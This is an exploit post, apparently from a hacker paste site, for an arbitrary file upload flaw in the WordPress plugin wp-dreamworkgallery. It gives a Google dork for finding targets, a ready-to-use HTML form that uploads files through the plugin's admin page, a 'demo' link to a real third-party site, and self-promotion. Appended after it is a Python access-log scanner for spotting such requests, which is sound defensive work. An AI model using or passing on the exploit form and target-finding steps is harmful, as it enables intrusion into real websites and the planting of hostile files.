Professional-hacker

Wordpress File Upload Vulnerability 2017

Mar 31st, 2017
##################################################JokerSecurity#########################################################
# Title : Wordpress File Upload Vulnerability 2017
# Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
# Tested on: [Kali-Linux]
# My YouTube channel : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
# My blog : http://kader-information.blogspot.com/
# Link video : https://www.youtube.com/watch?v=h1xWghkVPEw
######################
# [+] DESCRIPTION :
######################

# 1: Search Google Dork and Choose a Target

###########
Code exploit :
###########
<html>
<body>
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

######

# 3 Upload Your File ==== File.html

######
Demo :
######
http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml

######################

Subscribe to my channel and my Facebook page

# My Blogger : http://kader-information.blogspot.com/

# Page Facebook 1 : https://www.facebook.com/AnonymousPalestine.vip

# Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/

# Page Facebook 3 : https://www.facebook.com/Professional.hacker.25/

By <3

##################################################JokerSecurity#########################################################
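
Added example, not part of the original paste: a log check a site owner can run to find requests that match the form above (a POST to wp-admin/admin.php with page=dreamwork_manage) or that touch the wp-dreamworkgallery plugin directory. It assumes Combined Log Format access logs; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ADMIN_PAGE = "dreamwork_manage"                          # page= value in the paste's form action
PLUGIN_DIR = "/wp-content/plugins/wp-dreamworkgallery/"  # plugin path named in the paste

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Mar/2017:10:02:11 +0000] "POST /wp-admin/admin.php?page=dreamwork_manage HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [31/Mar/2017:10:02:15 +0000] "GET /wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [31/Mar/2017:10:03:00 +0000] "POST /wp-admin/admin.php?page=akismet HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [31/Mar/2017:10:04:00 +0000] "POST /WP-Admin/admin.php?foo=1&page=dreamwork%5Fmanage HTTP/1.1" 403 0 "-" "curl/7.52"',
]

def classify(line):
    """Return a hit dict for a request that touches the plugin, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Collapse leading slashes so "//wp-admin/..." is not parsed as a host name.
    url = urlsplit("/" + m["target"].lstrip("/"))
    path = unquote(url.path).lower()
    pages = [p.lower() for p in parse_qs(url.query).get("page", [])]
    if m["method"] == "POST" and path.endswith("/wp-admin/admin.php") and ADMIN_PAGE in pages:
        kind = "admin-page-post"  # the body (task field, file part) is not in access logs
    elif PLUGIN_DIR in path:
        kind = "plugin-path-access"
    else:
        return None
    status = int(m["status"])
    return {"ip": m["ip"], "ts": m["ts"], "kind": kind, "status": status, "served": status < 400}

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

def clients_to_review(hits):
    """Clients whose POST to the plugin's admin page was not rejected (status < 400)."""
    return sorted({h["ip"] for h in hits if h["kind"] == "admin-page-post" and h["served"]})

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print("review:", clients_to_review(scan(SAMPLE_LOG)))
```

A hit with "served" set only means the server did not reject the request; confirm against the plugin's files and the WordPress media and album records before treating it as a successful upload.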